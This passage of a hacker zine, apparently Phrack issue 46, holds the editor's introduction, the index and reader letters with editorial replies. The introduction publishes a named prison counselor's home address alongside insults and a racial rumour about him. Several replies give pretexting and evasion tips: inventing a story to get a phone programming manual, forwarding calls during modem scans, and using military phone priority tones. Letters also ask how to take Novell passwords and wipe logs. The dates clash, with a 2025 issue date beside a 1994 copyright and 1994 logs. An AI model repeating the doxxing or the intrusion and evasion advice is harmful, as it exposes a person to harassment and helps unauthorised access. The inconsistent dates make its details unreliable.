==Phrack Magazine==
Volume Five, Issue Forty-Six, File 1 of 28
Issue 46 Index
P H R A C K 4 6
September 20, 2025
"La cotorra que chi, no canta"
Honey, I'm home! Anyway, like the little proverb above indicates, I've
been a very busy man since the last issue. I've been denied entry to
a federal prison in North Carolina (imagine the irony of THAT); I've
been whoring in the Red-Light District of Amsterdam with military
intelligence officers from England, Spain and the US; estuve chicaito en
Nuevo Lardeo; I've tested wireless networks in Canada; and I've been
on TV a few more times. (No, nimrod, Phrack is not my job...I WORK
for a living.)
Needless to say, it has been a chore for me to get Phrack out at all,
much less only a month or so past my self-imposed quarterly deadline.
But hell, I love doing this magazine, so here it is. Phrack is the only
way I can completely thrill and simultaneously piss off so many people
at once, so I don't think I'll stop any time soon.
Pissing people off. It's what I like to do, and it would appear that
I'm quite good at it. I realize that there are several extremely
vocal erikb-bashers out there. And to them I say, "smooches!"
Let's face it, sour grapes make bad whiners. But hey, "As long as they're
talking about Erikb, let 'em talk." (Sorry Mr. Ford)
Besides piecing together this issue, I've been working on getting
the WWW pages together. They still aren't 100%, but they are getting
there. By the time I finally get them together, the Phrack
Web Site should be the ultimate underground resource on the net.
Check it out: http://freeside.com/phrack.html
You may be interested in the federal prison remark from the first
paragraph. I had a meeting at IBM out in Research Triangle Park. I
figured that this would be an ideal time to go see Co/Dec who still has
several years of federal time left to serve. Co/Dec is in
the Federal Correctional Institute at Butner, North Carolina, a short
30 or so minutes from where I was staying in RTP.
Anyway, I receive the necessary forms from Co/Dec to get on the approved
visitors list, and sent them back in. After several weeks, Co/Dec said
that I still had not been added. My trip was slated for a week away, so
I called his counselor, Wilbert LeMay. Mr. LeMay told me that he never got
my forms. I then fed-ex'ed a copy (that I luckily had kept). It arrived
on Friday morning, and I was to arrive on Monday. Mr. LeMay had assured me
that it would be no problem to get me added to Co/Dec's list.
When I arrived on Monday, I called the prison to make sure the visit had
been cleared. Mr. LeMay would not return my calls. In fact, not only
would he not return any of the 5 or so calls I made, but he didn't even
bother to enter my name on the visitor list until the Wednesday after I
had already left North Carolina.
I'm sorry, but this man must be a real prick.
A bit of background on LeMay. First off, according to those on the inside,
LeMay dislikes white people. He supposedly keeps a picture of slaves
picking cotton on his desk as a constant reminder of the oppression his
people were subjected to. But perhaps working in the prison system where
you have constant view of the Aryan Brotherhood in action, I'm sure many
would begin to feel likewise. (Can't we all just get along?) Secondly,
LeMay dislikes Co/Dec. He put Co/Dec in solitary confinement for weeks
because Co/Dec had a DOS MANUAL! A fucking DOS MANUAL! You do not
put someone in the fucking hole for brushing up on the syntax for xcopy!
You put them in the hole for inciting a fucking shank war, or for stealing
food, or for punching a guard. Later, Co/Dec found himself in solitary
confinement AGAIN because he traded some smokes for telephone parts he was
going to use to fix a radio. The hole again. Not for weapons and drugs,
NO! Much worse: wires and a speaker!
The prison now considers Co/Dec a security risk, and read all OUTGOING
mail he sends. Not just the regular reading of all incoming mail
that any inmate would expect. He can't take any clases, he's had
several more days added to his sentence for "bad time served,"
and in addition, all of his phone calls are live monitored and recorded.
(A funny note, during one conversation I found that my touchtones would
control the equipment they were using to record the call. The equipment
they were using was improperly connected and gave off a terrible hum
when activated. I kept turning off the recording, and the security
officer kept having to turn it back on.)
All of this, due to Counselor Wilbert LeMay. Thanks guy.
If someone can so grossly abuse their power to completely remove the
dignity of another human being, inmate or otherwise, that person needs
to face severe disciplinary action. I'm writing the warden. Directory
Assistance says that Wilbert can be reached at:
Wilbert LeMay
701 East E St.
Butner, NC 27509
Fun fact: Butner is serviced by GTE.
You know, its pretty odd that as hackers, we probably know a larger number
of ex-cons and current inmates than most people.
But anyway, on to Phrack.
This issue is pretty odd in that "The Man" has consented to write
a few syllables for us to distribute. Yes, Winn Schwartau submitted
his unique perspectives of Defcon and HOPE. It's funny how many people
left Defcon this year and ran home to find information on HIRF weapons
after hearing Winn speak. (If you've actually built one by now, email
What else? GS1, Pagers, Voice Mail, VisaNet, Area 51, Programs,
Conferences, and an incomplete university dialup list. (Putting out
an incomplete list really irritates me, but hell, its taking a LOT
longer than I expected to get some 1300 dialups without more help.
Can you dig it? I knew that you could.
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Enjoy the magazine. It is for and by the hacking community. Period.
Editor-In-Chief : Erik Bloodaxe (aka Chris Goggans)
3L33t : Ice-9 (for helping me get this done!)
Rad Band : Green Day
News : Datastream Cowboy
Photography : The Man
Prison Consultant : Co / Dec
The Young Girl : Jane March
Motor Trend's Car
of the Year : The 2600 Van
Dickhead of the Month : Wilbert LeMay at FCI Butner
Thanks To : Szechuan Death, Carl Corey, The Shining, Dcypher
Hitman Italy, Herd Beast, Dr. Delam, Maldoror,
The Red Skull, PsychoSpy, Seven Up, Erudite, Ice Jey
Special Thanks To : Winn Schwartau
Phrack Magazine V. 5, #46, September 20, 2025. ISSN 1068-1035
Contents Copyright (C) 1994 Phrack Magazine, all rights reserved.
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-= Phrack 46 =-
Table Of Contents
1. Introduction by The Editor 17 K
2. Phrack Loopback / Editorial 52 K
3. Line Noise 61 K
4. Line Noise 56 K
5. Phrack Prophile on Minor Threat 12 K
6. Paid Advertisement 62 K
7. Paid Advertisement (cont) 45 K
8. The Wonderful World of Pagers by Erik Bloodaxe 24 K
9. Legal Info by Szechuan Death 13 K
10. A Guide to Porno Boxes by Carl Corey 13 K
11. Unix Hacking - Tools of the Trade by The Shining 42 K
12. The fingerd Trojan Horse by Hitman Italy 32 K
13. The Phrack University Dialup List 12 K
14. A Little About Dialcom by Herd Beast 29 K
15. VisaNet Operations Part I by Ice Jey 50 K
16. VisaNet Operations Part II by Ice Jey 44 K
17. Gettin' Down 'N Dirty Wit Da GS/1 by Maldoror & Dr. Delam 25 K
18. Startalk by The Red Skull 21 K
19. Cyber Christ Meets Lady Luck Part I by Winn Schwartau 45 K
20. Cyber Christ Meets Lady Luck Part II by Winn Schwartau 42 K
21. The Groom Lake Desert Rat by PsychoSpy 44 K
22. HOPE by Erik Bloodaxe 51 K
23. Cyber Christ Bites the Big Apple by Winn Schwartau 60 K
24. The ABCs of Better Hotel Staying by Seven Up 12 K
25. AT&T Definity System 75/85 by Erudite 13 K
26. Keytrap v1.0 Keyboard Key Logger by Dcypher 35 K
27. International Scenes by Various Sources 44 K
28. Phrack World News by Datastream Cowboy 38 K
Total: 996 K
"Most hackers would have sold out their mother."
Justin Tanner Peterson
"Treason is loved of many but the traitor hated of all."
Robert Greene (1552-1592)
"They smile in your face, but all the while they want to take your place."
The O'Jays
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 2 of 28
Phrack Loopback
I'd like to write you about my friends cat. His name is 'Cid. Cid
loves reading, in fact he'll read just about anything, from the labels on
his cat food tins to the instructions on the "real" use of his Grafix
(incense burner :) ). Well one take, 'Cid (or was it me) was indulging
in the reason he got his moniker and mentioned that he'd like to receive
Phrack. Well i told him he could just subscribe to it and then he went
into a real sob story about how he doesn't have net access. So as a
favor to 'Cid (who really does exist, and really has tripped out on brain
blotters) i'd like to subscribe to Phrack.
[You my want to take note that Phrack can also be printed on paper.
Now, that's a lot of blotter.
You've got your subscription, now go watch some anime.]
I recently got a new job and shortly after beginning working there, they
decided to retool and reorganize a bit for better productivity.
While we were going through some old boxes and stuff, I came across a
little black box with the words "Demon Dialer" molded into the front of
it, it even had the (functional!) 20volt power supply.
Needless to say I was pretty happy with my find. I asked if I could have
it and since no one else there seemed to know what to make of it, mine it
My only problem now... I've played around with it, and it seems to do a
lot more than what I originally thought, but the fact of the matter is..
I really haven't the foggiest idea of how to get it to REALLY work for me.
If anyone has any information, or better still, actual documentation for
a Telephonics Inc, Demon Dialer.. I'd really appreciate passing it on to me.
Also, something rater strange. The phone cable attached to it had a
normal looking 4-wire connector on one end, but the other was split to
have RJ jacks, one with the yellow-black combo and one with the
red-green. The split ends (sorry :)) were plugged into the WALL and
PHONE jacks on the demon dialer. The purpose for this perplexes me since
one's supposed to be input and one's supposed to be a passthrough for the
phone to be plugged into.
Anyway, any info would be nice. Thanks guys.
[Telephonics was one of those odd telco device manufacturers back in the
80's. They made the demon dialer (a speed dialing device), a
two-line conference box, a divertor, etc. Essentially, they provided
in hardware what the telco's were beginning to roll-out in software.
I think the line splitter you have was merely plugged into those
two jacks for storage purposes. What that probably was for was to
allow two lines to use the Demon Dialer. It was probably just reversed
when your company boxed it so it wouldn't get lost.
I'm not sure if Telephonics is still in business. A good place to
start looking for info would be comp.dcom.telecom or alt.dcom.telecom.
Another good place may be Hello Direct (800-HI-HELLO). They used to
do have Telephonics equipment available for mail-order.]
I saw an ad for a book called "Secrets of a SuperHacker" by Knightmare.
Supposedly it intersperses tales of his exploits with code and examples.
I have big doubts, but have you heard anything good/bad about it?
[Your doubts are well founded. I got an advance copy of that book.
Let's put it this way: does any book that contains over a dozen pages
of "common passwords" sound like ground breaking material?
This book is so like "Out of the Inner Circle" that I almost wanted
to believe Knightmare (Dennis Fiery) was really yet another
alias for Bill Landreth. Imagine "Out of the Inner Circle" with
about a hundred or more extra pages of adjectives and examples that
may have been useful years back.
The Knightmare I knew, Tom in 602, whose bust by Gail Thackeray
gave law enforcement a big buffer of the Black Ice Private BBS
and help spark the infamous LOD Hacker Crackdown, certainly didn't
have anything to do with this. In fact, the book has a kind of
snide tone to it and is so clueless, that leads me to believe it
may have been written by a cop or security type person looking to
make a quick buck.
As far as source code, well, there is a sample basic program that
tries to emulate a university login.
If you want a good book, go buy "Firewalls and Internet Security" by
Cheswick and Bellovin.]
Hey Chris,
I'm sure you are under a constant avalanche of requests for certain files,
so I might as well add to your frustration . I know of a program
that supposedly tracks cellular phone frequencies and displays them on
a cellmap. However, I don't know the name of the program or (obviously)
where to find this little gem. I was wondering if you could possibly
enlighten me on a way to acquire a program similar to the one I have
described. I have developed some other methods of tracking locations
of cellular calls. However my methods rely on a database and manually
mapping cellular phones, this method is strictly low tech. Of course
this would be for experimental use only, therefore it would not be used
to actually track actual, restricted, radio spectrum signals. I wouldn't
want the aether Gestapo pummeling our heads and necks.
[I don't know of anything that plots frequencies on a cellmap. How would
you know the actual locations of cells for whatever city you may
be in to plot them accurately?
There are a number of programs written to listen to forward channel messages
and tell you when a call is going to jump to another channel. The cellular
telephone experimenter's kit from Network Wizards has a lot of nice
C source that will let you write your own programs that work with their
interface to the OKI 900. I suppose you could get the FCC database
CD-ROM for your state and make note of longitude and latitude of cell sites
and make your own database for your city, and then make a truly
visual representation of a cellmap and watch calls move from cell to cell.
But I don't think there is such a thing floating around the underground
at present.
Of course the carriers have this ability, and are more than happy to make
it available to Law Enforcement (without a warrant mind you). Hi OJ!
email Mark Lottor mw@nw.com for more info about the CTEK.]
I saw this in a HoHoCon ad:
Top Ten Nark List
1. Traxxter
2. Scott Chasin
3. Chris Goggans
4. Aget Steal
5. Dale Drrew
6. Cliff Stoll
7. [blank]
8. Julio Fernandez
9. Scanman
10. Cori Braun
What did Chris Goggans do? Isn't he Erik Bloodaxe, the publisher of
Phrack? I sincerely doubt that the feds would have someone
working for them that puts out a publication like Phrack. It would
be way too much of an embarrassment for them. I wrote to the
editor of Phrack when I read that Agent Steal said that the publisher
of Phrack was a Fed - IN PHRACK no less. He said it was a stupid rumor.
Is there anything to support this fact? And why is there now some manhunt for
Agent Steal (at CFP the FBI was checking legs) if Steal was admittedly
their employee? The whole thing is very confusing to me. Please explain.
If Goggans isn't Bloodaxe then he'd Knight Lightning (this just came to me).
Nevertheless, what's the story here?
[First off, I think you take things a little too seriously. If you are on
a nark hunt, worry about your associates, not people you obviously
don't even know. Chris Goggans (ME) is most positively Erik Bloodaxe.
Thanks for remembering.
Agent Steal was involved with the FBI. This is a fact.
In his case, he even appeared to have some kind of immunity while trying
to gather information on other hackers like Mitnik and Poulsen. This
immunity is under scrutiny by the Bureau's own Internal Affairs (or so the
new rumors go), since Steal was pulling a fast one and committing crimes
the Bureau didn't know about to get some quick cash while he set up his
My story is a bit more convoluted. You can sum it up by saying, if you
interfere with my businesses, I'll try my best to track you down and turn
you in. I guess I am a nark.]
I read in the last Phrack (45) that you wanted someone to write a few
words on scrambling systems. Give me a rough outline of what you want
and I'll see if I can help :-) Basically I wrote the Black Book
(European Scrambling Systems 1,2,3,4,5 and World Satellite TV &
Scrambling Methods) and also edit Hack Watch News & Syndicated
HackWatch. They all deal with scrambling system hacks as opposed to
computer hacking & phreaking. (Things are a bit iffy here as regards
phreaking as all calls are logged but the eprom phone cards are easy
to hack) Oh yeah and another claim to fame ;-) if you can call it
that, is that I was quoted in an article on satellite piracy in
"Wired" August issue.
This Hawkwind character that you had an article from in Phrack43
sounds like a *real* hacker indeed :-> Actually there is an elite in
Ireland but it is mainly concerned with satellite hacking and that
Hawkwind character is obviously just a JAFA (Irish hacker expression
- Just Another Fu**ing Amateur). Most of the advanced telco stuff is
tested in the south of the country as Dublin is not really that
important in terms of comms - most of the Atlantic path satellite
comms gear and brains are on the south coast :-)
Actually the Hawkwind article really pissed off some people here in
Ireland - there were a few questions asked on my own bbs (Special
Projects +353-51-50143) about this character. I am not even sure if
the character is a real hacker or just a wannabe - there were no
responses from any of his addresses. SP is sort of like the neutral
territory for satellite and cable hacking information in Europe
though there are a few US callers. With the way things are going with
your new DBS DirecTv system in the US, it looks like the European
satellite hackers are going to be supplying a lot of information
(DirecTv's security overlay was developed by News Datacom - the
developers of the totally hacked VideoCrypt system here in Europe).
There telco here uses eprom phone cards. These are extremely easy to
hack (well most real hackers in .IE work on breaking satellite
scrambling systems that use smart cards) as they are only serial
[About the satellite information: YES! Write the biggest, best
article the whole fucking hacker world has ever seen about
every aspect of satellite tv!! Personally, I'm more interested in
that than anything else anyone could possibly write (seeing as how
I'm about to buy a dish for both C and Ku).
About Hawkwind's article on hacking in Ireland: If I were to write
an article about hacking in America, it would be entirely different
than anyone else in America would write. A country is a big place.
Just because someone else's hacking experience is different than
your own, it's no reason to discredit them. However, if your
exposure to the scene in Ireland is so completely different than
Hawkwind's, I would LOVE to print it as well.]
The Columbus Freenet uses a password generating routine that takes the
first and last initial of the user's real name, and inserts it into a randomly
chosen template. Some of the templates are:
(f)22ww5(l) where f and l are first and last initials
and so on. There are not too many of these templates, I guess maybe 50.
I imagine most people go in and change their password right away, but
then again that's what a prudent person would do (so they probably don't).
Columbus 2600 meetings:
Fungal Mutoid-sysop of The KrackBaby BBS (614-326-3933) organized the
first 2600 meetings in Columbus, unfortunately hardly anyone shows up...
I don't know why HP is so dead in Central Ohio, but fear and paranoia
run rampant.
That's all for now...keep up with the good work!
[Hmmm...templates are always a bad thing. All one has to do is get the
program that generates them, and viola, you've got a pre-made dict file
for your crack program. Not very smart on the part of the Freenet,
but hacking a Freenet, is like kicking a puppy.
I hope more people go to your 2600 meetings. The ones here in Austin
kinda died out too. Maybe our cities are just lame.]
A complaint: That piece about McDonald's in Phrack 45 was, in a word, LAME.
Surely Phrack can do better. Maliciousness for its own sake isn't very
interesting and frankly the article didn't have any ideas that a bored
13-year-old couldn't have thought up--probably written by one.
That aside, I found some good stuff in there. Some of it was old news,
but Phrack serves an archival purpose too, so that was ok. On a more
personal note, I could really relate to your account of HoHoCon--not that
I was there, just that I have started to feel old lately even though I don't
turn 25 for another 2 days :) Sometimes I feel myself saying things like
"Why, sonny, when I was your age the Apple II was king..."
Keep up the good work, and don't let the lamers get you down.
[Thanks for the letter. I personally thought the McDonald's file was
a laugh riot. Even if it was juvenile and moronic, I wouldn't expect
anyone to analyze it and go through with anything it contained. It was
just for fun. Lighten up :)
I am glad to see that at least someone else recognizes that Phrack
is attempting to serve as an archive of our subculture, rather than just
a collection of technical info that will be outdated overnight, or a
buglist that will be rendered mostly unusable within hours of release.
There is so much going on within the community, and it is becoming such a
spectacle in the popular media, that in 20 years, we can all go back and
look at Phrack and remember the people, places, and meetings that
changed the face of the net.
Or maybe I'm just terribly lame, and either 1) refuse to put in the
good stuff, 2) don't have access to the good stuff, 3) exist only as a
puppet agent of The Man, or 4) Don't know nothin' 'bout Telco!
But you know what they say about opinions.]
I have a few comments on your editorial in Phrack 44 (on information
wants to be free). Thanks for voicing an opinion that is shared by many
of us. I am glad to see a public figure in the CuG with nutz enuff to
actually come out and make such a statement and mean it.
Again, thanks.
Now on the subject of hacking as a whole. Is it just me, or are the number
of losers on the increase? There have always been those who would try
and apply these skills to ripoff scams and system trashing but now that
seems to be the sole intent of many of the "hackers" I come into contact
with. What ever happened to hacking to learn more about the system. To
really hack a system (be it phone, computer), is a test of skill and
determination, and upon success you walk away with a greater understanding
of the machine and its software. Hacking is more than just knowing how
to run crack on a filched password file, or using some exploitation
scripts picked up on IRC, it is a quest for knowledge and gaining
superiority over a system by use of great skill acquired by a deliberate
effort. Once was a time when things like toll fraud (I do miss blue
boxes) were a means to an end, now they seem to be the end in itself.
Also, I am researching info on OSI comsec procedures and have found some
really interesting goodies, if you are interested in publishing
my piece when completed, let me know..
[(NOTE: This came from a .mil)
Man, I'm glad to see that people in the armed forces still have minds
of their own. Not many people would express such a thing openly.
Yes, the destructive/profit-motivated trends of many of the hackers of
today are pretty sad. But you have to realize, as the technology
becomes more and more like consumer electronics, rather than the
traditional mold of computer as scientific research tool, an entirely
different market segment will be exposed to it and use the technology
for less than scrupulous means.
Even the act of hacking itself. Today, I can basically gain access
to any model of system known to man by asking. I realize that
there are many who cannot accomplish such a thing, but with the
proliferation of public access sites, almost everyone can afford
access to the net to explore and learn. The point comes down to this:
if you have an account on a Sun, why do you need an account on a Sun
at Boeing, unless you either 1) want to sell the cad files of the 777 to
Airbus or McDonnell-Douglas 2) want to get financial information to
make a killing on Wall Street, or 3) just want to have an ego boost
and say "I OWN BOEING!"
Personally, I can understand the ego boost aspect, but I've decided that
I'd much rather get paid by a company like Boeing to hack for them
than against them. I don't want to sell anyone's info, so hacking
into any company is basically useless to me, unless they are paying me
to look for potential weaknesses.
Granted, it's not an easy market to get into, but it's a goal to
shoot for.
And for those who find it impossible to quit due to fear of losing
their edge, check out my editorial in this issue for a possible
I am looking for a Macintosh app that does the same thing as an app
called "Demon Dial" that has been lost in the annals of software
history due to the fact that some people (sysops) question whether it
is illegal software (it dials up a series of phone #'s looking for data
connections). Do you know where I could find an application for the Mac
that does this simple function?
[We had a guy ask in an earlier issue for Macintosh hacking/phreaking
apps. Noone responded. Hell, I know SOMEONE has to use a Mac
out there. Are you Mac-weenies all embarrassed to speak up?
Hell, uuencode and email me your aps, and I'll put them up for
ftp! Help out your poor fellow Macintosh users. I certainly
would if I could, but the thought of touching a Mac gives me the
Have you ever heard of being denied access to your own cell phone?
I am currently in the process of buying a cell phone and was informed
that I COULD NOT have the programming guide of the security code
they enter to program my phone. In my opinion the key word is "MY."
If I get a digital security system for my house you better damn well
figure I will have the security codes for that. The phone was a Motorola
flip phone. I called Motorola and explained how displeased I was with
this company and they said they could not interfere with a reps. policy.
When I was selling car phone we kept the programming guide unless they
asked for it. I demanded it and they laughed in my face. Who said
"the customer is always right" anyway?
Thanks, any info is greatly appreciated. By the way, you wouldn't
happen to have the CN/A number for 815 would you? Also, any ANAC
would be very helpful.
[Well, I hate to say it, but you got typical service from your
cellular agent. Let's face it, these sales reps probably knew
about as much about that programming manual as I do nuclear
physics: "Its confusing, but if you understand it, you can fuck
things up."
I am surprised that Motorola wouldn't sell you the book though.
Motorola will sell anybody anything. You probably called the wrong
place. Moto is so huge they've got multiple groups working on somewhat
similar technologies with absolutely no communication between the groups.
Sometimes they are in different countries, but sometimes they are in the
same city! I would suggest you call a local FAE (Field Applications
and get them to get the book for you. Make up some story about
working on some computer controlled application with the phone, and that
you need any and all documentation on the phone. They'll do it. Money
is money.
As far as the 815 CNA, hell, just call the business office. I haven't
called a CNA in years, only the business office. They are nice people.
And no PINs.
815 ANAC: ok guys, someone must have one...email it!
"The customer is always right" wasn't in Bartlett's or Columbia's
books of famous quotations. I guess that phrase has been written out of out
history. So, from now on you aren't always right, I guess.]
Dear Phrack:
We want you!
We want you to be a part of our cutting edge documentary that is traversing
across the "NEW EDGE" of computers, culture, and chaos.
Working in conjunction with Douglas Rushkoff, the best selling author of
"CYBERIA," we are currently gathering together the leaders of this
technological and cultural revolution. This is not a documentary in the
traditional sense of the word. It is more of an exploration, a journey, a
unique vision of the world as seen through the eyes of those who live on the
bleeding edge; where technology, art, science, music, pleasure, and new
thoughts collide. A place people like you and me like to call home.
"New Edge" will deliver a slice of creativity, insanity, and infallibility,
and feed those who are hungry for more than what Main Street USA has to
offer. This project will detonate across the US and around the world. It
will become the who's who of the new frontier and you belong on it's
illustrious list of futurians. Please look over the enclosed press release
description of the project.
Phrack has long been the ultimate source for hack/phreak info, and helped to
push the limits of free speech and information. The role that Phrack has
played in the Steve Jackson Games Case set an important precedent for
CyberLaw. We will also be interviewing several people from the EFF.
Please call me ASAP to schedule an interview for "New Edge", or send me
Todd LeValley
Producer, N E W E D G E
(310) 545-8138 Tel/Fax
-the documentary-
T h e O r g a n i z a t i o n
Belief Productions in association with Film Forum.
T h e M i s s i o n
Journey through the labyrinth of cyberia and experience the people, places
and philosophy that construct cyberspace and the shores of the technological
frontier. This fast paced visual voyage through the digital revolution will
feature interviews with the innovators, artists, cyberpunks, and visionaries
from all sides of the planet. These specialists are the futurists who are
engineering our cybergenic tomorrow in laboratories today. Along the way we
will investigate the numerous social and political issues which are cropping
up as each foot of fiber optic cable is laid. Artificial intelligence, the
Internet, nanotechnology, interactive media, computer viruses, electronic
music, and virtual reality are just a few of the many nodes our journey will
T h e F u n d i n g
This exploration is sponsored in part by a grant from The Annenberg
Foundation in association with the LA based non-profit cutting-edge media
group Film Forum.
T h e P r o c e s s
The New Edge project will capture moving images with a variety of input
devices and then assemble them into one fluid documentary using Apple
Macintosh Quadras & PowerMac computers. The post production work will be
done entirely on the computers using the Radius Video Vision Telecast Board
in conjunction with Quicktime software applications such as Adobe Premiere
4.0 and CoSA After Effects 2.01. The final piece will be recorded to BETACAM
SP videotape for exhibition and distribution. The capture formats for the
project will include: BETACAM SP, Super VHS, Hi-8, 16MM Film, Super-8 Film,
35MM Stills, and the Fisher
Price Pixelvision 2025.
T h e R e s u l t s
New Edge will pride itself on an innovative visual and aural style which
before today, could only be created on high-end professional video systems
and only for short format spots. The New Edge documentary will be two hours
in length and will have a dense, layered look previously featured only in
much shorter pieces. New Edge will be a showcase piece not only for the
content contained within, but for the way in which the piece was produced.
It will be a spectacular tribute to the products and technology involved in
its creation.
D i s t r i b u t i o n
Direct Cinema - Distributes videos to Libraries, Schools, and Universities
throughout the United States.
Mico Entertainment/NHK Enterprises - Provider of American programming for
Japanese Television.
Labyrinth Media Ltd. - European reality-based documentary distributor
T h e A u d i e n c e
New Edge is aimed at both the technophiles and technophobes alike. While the
show will feature very complex and sophisticated topics, the discussions will
be structured to appeal to both those who do and do not have the technical
framework that underlines the cyberian movement. The show's content and
style will make it readily available to the MTV and Generation X demographic
groups as well as executives who want to stay on top of the latest
technological advances. Individuals who read Mondo 2025 and Wired magazine
will also naturally latch on to this electronic
presentation of their favorite topics.
T h e G u i d e s
Mike Goedecke - Director/Graphic Designer
Mike was the Writer/Director/Cinematographer for the Interplay CD-ROM game
entitled Sim City. Acting as graphic designer for the Voyager Co.- Criterion
Laser Disc Division his work is featured on titles such as: Akira, DEVO-The
Truth About De-Evolution, The Adventures of Baron Munchausen, and Spartacus.
Most recently he collaborated with Los Angeles Video Artist Art Nomura on a
video installation piece entitled Digital Mandala. The piece was edited,
composited , and mastered to Laser Disc using an Apple Macintosh Computer and
off-the-shelf software. The installation is scheduled to tour museums and
art galleries across the United States and Europe. While attending
Cinema/Television Graduate School at the University of Southern California,
Mike directed the award winning documentary short Rhythm, which celebrates
various musical cultures.
Todd LeValley - Producer/Graphic Designer
Todd is the Producer/Director of CyberCulture: Visions From The New Edge, a
documentary that introduces the electronic underground. This project has
been warmly received at numerous "Cyber Festivals" around the country, as
well as at the Director's Guild Of America, and is currently being
distributed by FringeWare Inc. Todd's commercial experience includes being
the in-house graphic designer for Barbour/Langley Productions designing,
compositing, and producing the graphic packages for several 20th Century Fox
Television pilots and The Sci-Fi Trader for the USA Network/Sci-Fi Channel.
Todd is a graduate of the Cinema/Television program at Loyola Marymount
Jeff Runyan - Cinematographer/Editor
Jeff received an MFA from the University of Southern California's Graduate
School of Cinema/Television with an emphasis in cinematography and editing.
He studied cinematography under the guidance of Woody Omens, ASC. and Earl
Rath, ASC., and editing with Edward Dmytryk. Jeff was the cinematographer on
the award wining documentary Rhythm. He has recently completed shooting and
editing a documentary on Academy Award winning Cinematographer Conrad Hall
for the ASC and has just finished directing a short film for USC
Douglas Rushkoff - Cyber Consultant/Author
Douglas is the author of the best selling Harper Collins San Francisco novel,
Cyberia. He spent two years of his life living among the key players in the
cyber universe. Douglas knows the New Edge well and is providing us with the
map to its points of interest, rest stops and travelers.
For more information, please contact:
Todd LeValley, Producer
Belief Productions
(310) 545-8138
[Dear New Edge:
You have got to be kidding me. "Readers of Wired and Mondo 2025 will
naturally latch on to this electronic presentation of their favorite
Aren't we awful fucking high on ourselves? Christ. Mondo & Wired
readers and writers (and stars) are themselves so fucking far removed
from the real meat of the underground, that they wouldn't
even be able to relate to it. Obviously this "documentary"
is going to be aimed at the wannabes who sit at home furiously
masturbating to "Cyborgasm" while installing FRACTINT, being very
careful not to soil their copy of "The Hacker Crackdown." Oh joy.
These guys are so fucking out of it, they sent me two letters.
One addressed to Phrack, the other to Phrack / Emmanuel Goldstein.
Maybe they think we're 2600.
CYBER-COUNT: 12 occurrences.
That's kind of low. I'm surprised your public relations people didn't
have you add in a few more cyber-this's or cyber-that's into the
blurb. Gotta keep that cyber-count high if you want to get those
digi-bucks out of those cyberians! CYBER!!!
Read my review of Cyberia guys...find a new pop-fad to
milk for cash.]
In less than 3 weeks, I will be leaving for Basic Training. Once out of
there, I will be working on Satellite Data Transmissions for the US
Army. I am highly excited, just waiting to see what type of computers
I will be working on. Anyways, I will be enrolled in a 32-week
accelerated technical class teaching me all about satellites, and
the computers that I will be using. Here's the kick. I'll be writing
a series of Tech Journals detailing the workings/operations of/weaknesses,
and the use of the systems. I was wondering if you would be interested
in carrying these. I've read Phrack for a long time, but it is an off
the wall subject. I'll also be playing with the military phone system,
in hopes of finding out what the ABCD tones do. (I heard from a file
that Military phones utilize them but I'm still a civilian, and am
Thanks for keeping me informed
[Sorry to hear about your impending Basic Training. I'm not big on
the military, as they would make me chop off all my hair.
About the Satellite systems: YES If you do indeed find time to write
up any files on how they work, systems involved, weaknesses, etc.
I'D LOVE TO PRINT THAT! Just make sure you don't blow your clearance.
Satellites are very cool. I'm about to buy a Ku Band disk to do some
packet radio type stuff. A bit low-tech compared to the Army, but hell,
I'm on a budget.
ABCD...they are used for prioritizing calls on AUTOVON. FTS doesn't
use them (I think), and they can only be used on certain lines.
They are:
A = priority
B = priority override
C = flash
D = flash override
For instance, if you want to make it known that this is an important
call, you hit the "a" button before dialing. It establishes a
priority-class call, which may cause a light to come on or something
as equally attention grabbing at the called party's end. Priority
calls cannot be interrupted, except by a Priority Override" etc,
with Flash Override being the highest class.
If you do these from an improper line, you will get an error message.
The one I used to get when BS'ing AUTOVON op's long ago
was "The President's use of this line is not authorized." Funny.
Let me know if any of this is still valid.]
Dear Phrack,
The following is a copy of a Toneloc found file my friend got. As happens
to my friend a lot the numbers aren't valid. But, you'll see he found at least
one System 75. It appears that the 75 had a tracer installed on it already.
My friend did not get a call back on it, and nothing has been done as far
as we know. But, I still wonder -- Is scanning no longer safe?
Castor [612]
56X-XXXX 22:57:34 03-Apr-94 C CONNECT 1200
Login: b
Login: c
56X-XXXX 23:04:12 03-Apr-94 C CONNECT 1200
Unknown command error
Unknown command error
Unknown command error
Unknown command error
56X-XXXX 23:49:19 03-Apr-94 C CONNECT 1200
[1;24r [1;1H [0J
Login: b
56X-XXXX 01:23:28 04-Apr-94 C CONNECT 1200
Login: b
Call traced to 612-XXX-XXXX.
Saving number in security log for further investigation.
[Jeez. That sure does suck.
Well, live and learn kiddoes. 1994 is not the time to be hacking
by direct dialing local numbers. It's just not all that smart.
Caller-ID has been tariffed in a lot of RBOCS. A lot of modem
manufacturers implemented caller-id features into their equipment.
Having these features in the equipment means that it won't be long
before people redesign all their login programs to make use of
these features. I would.
I've got an ISDN line. Every time I call out, the SPID (phone number)
of the B channel I'm using is broadcast. There is nothing I can do
about that. On a remote connection, almost all decent ISDN terminal
adaptors have the option to block any SPID they don't know. They won't
even answer the phone, because they receive and interpret the phone
number before any session is established.
Yeah, well, that's ISDN, but it will not take a genius to do a few
quick hacks on some linux box and we will suddenly be inundated with all
kinds of "security packages" that use modems with Caller-ID.
Yeah, I know, *67 (or whatever it is) to block the data, or
route the call through another carrier so the data won't get passed
(10288-NXX-XXXX). The data is still in the system, just not being
transmitted from the switch out to the party being called.
It amazes me how many really smart people I know have been busted
solely because they were hacking local systems and calling them
Scanning has always been a very tricky subject. Since you are paying
for a phone line, and if you have flat-rate service, you are
thereby entitled to call as many numbers as you want. The big issue
a while back was dialing sequentially (which set some telcos on a rampage
because call usage patterns looked like telemarketing machines).
The other problem is harassment. One call to an individual is a wrong
number. Two is bordering on harassment. So, doing a complete scan
and calling the carriers back through some other method would be
a fairly good idea. And always have your calls forwarded to a
non-working number so the 5,000 assholes who call-return you
during the scan won't interfere.
If you are lucky enough to live in the boonies, you are probably
still somewhat safe, but everyone else...be careful.]
I was wondering if anyone has ever done an article on breaking
Novell Network through a workstation. I've heard it can be done through
the SysAdmin computer, but is there a way to find the userlist and
passwords? Also how would I go about cleaning up after myself so as to
not leave a trace on the logs. I would appreciate a way other than screen
capture, but if anyone knows of a good boot record booting program to
do a capture of every key typed that would be great, and maybe it
could be uuencoded in the next Phrack!
Thanks again for making the best, ass kickin', a step above the
rest, brain moving, earth shaking, body shivering, fist shaking, totally
bitchin', muy excelente, awesome H/P magazine in the whole world! :)
The Warden
